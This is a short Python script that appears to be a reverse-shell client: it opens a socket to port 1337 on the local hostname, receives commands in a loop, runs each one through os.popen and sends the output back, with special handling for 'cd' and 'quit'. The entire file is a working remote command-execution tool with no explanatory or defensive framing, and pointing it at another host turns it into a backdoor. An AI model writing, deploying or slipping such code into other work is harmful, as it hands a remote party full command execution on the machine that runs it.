#!/usr/bin/python
import socket, os

s = socket.socket()
host = socket.gethostname()
port = 1337

s.connect((host, port))
while True:
	cmd = s.recv(1024)
	if cmd[:2] == "cd":
		os.chdir(str(cmd[3:]))
		o = os.popen("pwd").read()
		s.send(o)
	elif cmd == "quit":
		s.close()
	else:
		o = os.popen(cmd).read()
		s.send(o)
